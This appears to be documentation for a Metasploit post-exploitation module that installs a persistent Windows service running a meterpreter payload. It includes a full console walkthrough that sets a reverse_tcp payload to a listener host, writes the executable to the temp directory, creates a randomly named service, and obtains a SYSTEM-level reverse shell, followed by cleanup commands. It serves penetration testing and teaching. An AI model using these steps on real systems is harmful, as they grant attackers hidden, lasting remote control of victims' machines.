Jacob Robles
3.8 KiB
3.8 KiB
Description
This Module will generate and upload an executable to a remote host, next will make it a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.
Options
REMOTE_EXE_NAME
The remote victim name. Random string as default.
REMOTE_EXE_PATH
The remote victim exe path to run. Use temp directory as default.
RETRY_TIME
The retry time that shell connect failed. 5 seconds as default.
SERVICE_DESCRIPTION
The description of service. Random string as default.
SERVICE_NAME
The name of service. Random string as default.
Verification Steps
- get session on target
use exploit/windows/local/persistence_serviceset payload <payload>set lport <lport>set lhost <lhost>exploit
Scenarios
Windows 7 SP1 x64
msf5 exploit(windows/local/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/persistence_service) > use exploit/windows/local/persistence_service
msf5 exploit(windows/local/persistence_service) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/persistence_service) > set lport 2333
lport => 2333
msf5 exploit(windows/local/persistence_service) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(windows/local/persistence_service) > set session 1
session => 1
msf5 exploit(windows/local/persistence_service) > exploit
[*] Started reverse TCP handler on 192.168.56.1:2333
[*] Running module against TEST-PC
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\NVNvCyn.exe
[*] Creating service NePaGwA
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc
[*] Sending stage (179779 bytes) to 192.168.56.101
[*] Meterpreter session 4 opened (192.168.56.1:2333 -> 192.168.56.101:52781) at 2018-10-22 17:56:21 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 4...
Clean it
msf5 exploit(windows/local/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > resource /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc
[*] Processing /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc for ERB directives.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> execute -H -f sc.exe -a "stop NePaGwA"
Process 6516 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> execute -H -f sc.exe -a "delete NePaGwA"
Process 6624 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> execute -H -i -f taskkill.exe -a "/f /im NVNvCyn.exe"
Process 5636 created.
Channel 23 created.
SUCCESS: The process "NVNvCyn.exe" with PID 5180 has been terminated.
SUCCESS: The process "NVNvCyn.exe" with PID 4828 has been terminated.
SUCCESS: The process "NVNvCyn.exe" with PID 5728 has been terminated.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> rm C:\\Users\\test\\AppData\\Local\\Temp\\NVNvCyn.exe
meterpreter >